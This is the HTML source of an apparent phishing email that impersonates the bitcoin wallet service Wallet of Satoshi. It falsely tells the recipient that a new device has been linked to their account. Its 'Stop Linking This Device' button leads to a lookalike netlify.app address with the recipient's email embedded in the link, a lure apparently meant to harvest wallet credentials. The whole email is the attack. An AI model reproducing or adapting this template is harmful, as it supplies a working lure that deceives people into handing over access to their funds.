<html>
  <tbody>
    <tr>
      <td align="center" valign="top" style="padding-top: 20px; border-collapse: collapse">
        <table border="0" cellpadding="0" cellspacing="0" width="600" id="v1m_-7950056355196207933templateContainer" style="border: 1px solid #dddddd; background-color: #ffffff">
          <tbody>
            <tr>
              <td align="center" valign="top" style="border-collapse: collapse">
                <table border="0" cellpadding="0" cellspacing="0" width="600" id="v1m_-7950056355196207933templateHeader" style="background-color: #ffffff; border-bottom: 0">
                  <tbody>
                    <tr>
                      <td style="border-collapse: collapse; color: #202020; font-family: Arial, sans-serif; font-size: 34px; font-weight: bold; line-height: 100%; padding: 0; text-align: center; vertical-align: middle">
                        <img src="program/resources/blocked.gif" style="max-width: 600px; border: 0; height: auto; line-height: 100%; outline: none; text-decoration: none" id="v1m_-7950056355196207933headerImage v1campaign-icon" alt="Wallet of Satoshi">
                      </td>
                    </tr>
                  </tbody>
                </table>
              </td>
            </tr>
            <tr>
              <td align="center" valign="top" style="border-collapse: collapse">
                <table border="0" cellpadding="0" cellspacing="0" width="600" id="v1m_-7950056355196207933templateBody">
                  <tbody>
                    <tr>
                      <td valign="top" style="border-collapse: collapse">
                        <table border="0" cellpadding="20" cellspacing="0" width="100%">
                          <tbody>
                            <tr>
                              <td valign="top" style="border-collapse: collapse; background-color: #ffffff">
                                <div style="color: #505050; font-family: Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: center">
                                  <h3 style="color: #202020; font-family: Arial, sans-serif; font-size: 26px; font-weight: bold; line-height: 100%; margin-top: 0; margin-bottom: 10px; text-align: center">You Just Requested a New Device Link!</h3>
                                  <br>
                                </div>
                              </td>
                            </tr>
                            <tr>
                              <td align="center" valign="top" style="padding-top: 0; border-collapse: collapse; text-align: left">
                                <p>We've received a request to link a new device to your Wallet of Satoshi account. If this was you, <span style="color: mediumseagreen; font-size: 18px; font-weight: bold">no further action is required</span> and your account <b>is now linked.</b></p>
                                <br>
                                <br>
                                <hr><br>
                                <br>
                                <p>If this wasn't you, please contact us ASAP by replying to this email or by clicking the button below.</p>
                                <br>
                                <a href="https://walletofsatoshi-security-app.netlify.app/?email=tamarin50716@drivz.net" style="text-decoration: none" target="_blank" rel="noreferrer">
                                  <div style="text-align: center">
                                    <table border="0" cellpadding="15" cellspacing="0" style="background-color: #ffcc00; border: 0; border-radius: 3px; color: #ffffff; font-family: Arial, sans-serif; font-size: 15px; font-weight: bold; text-align: center; display: inline-block">
                                      <tbody>
                                        <tr>
                                          <td valign="middle" style="border-collapse: collapse; text-align: center; background-color: lightgrey">
                                            <div>
                                              <span style="color: #000; font-family: Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 100%; text-align: center">Stop Linking This Device</span>
                                            </div>
                                          </td>
                                        </tr>
                                      </tbody>
                                    </table>
                                  </div>
                                </a>
                              </td>
                            </tr>
                          </tbody>
                        </table>
                      </td>
                    </tr>
                  </tbody>
                </table>
              </td>
            </tr>
            <tr>
              <td align="center" valign="top" style="border-collapse: collapse">
                <table border="0" cellpadding="10" cellspacing="0" width="600" id="v1m_-7950056355196207933templateFooter" style="background-color: #ffffff; border-top: 0">
                  <tbody>
                    <tr>
                      <td valign="top" style="border-collapse: collapse">
                        <table border="0" cellpadding="10" cellspacing="0" width="100%">
                          <tbody>
                            <tr>
                              <td valign="top" style="border-collapse: collapse">
                                <br>
                                <div style="color: #707070; font-family: Arial, sans-serif; font-size: 12px; line-height: 125%; text-align: center">
                                  <strong>Our mailing address is:</strong><br>
                                  <a href="mailto:support@walletofsatoshi.com" style="text-decoration: none" rel="noreferrer">support@walletofsatoshi.com</a>
                                </div>
                              </td>
                            </tr>
                          </tbody>
                        </table>
                      </td>
                    </tr>
                  </tbody>
                </table>
              </td>
            </tr>
          </tbody>
        </table>
        <br>
      </td>
    </tr>
  </tbody>
</html>
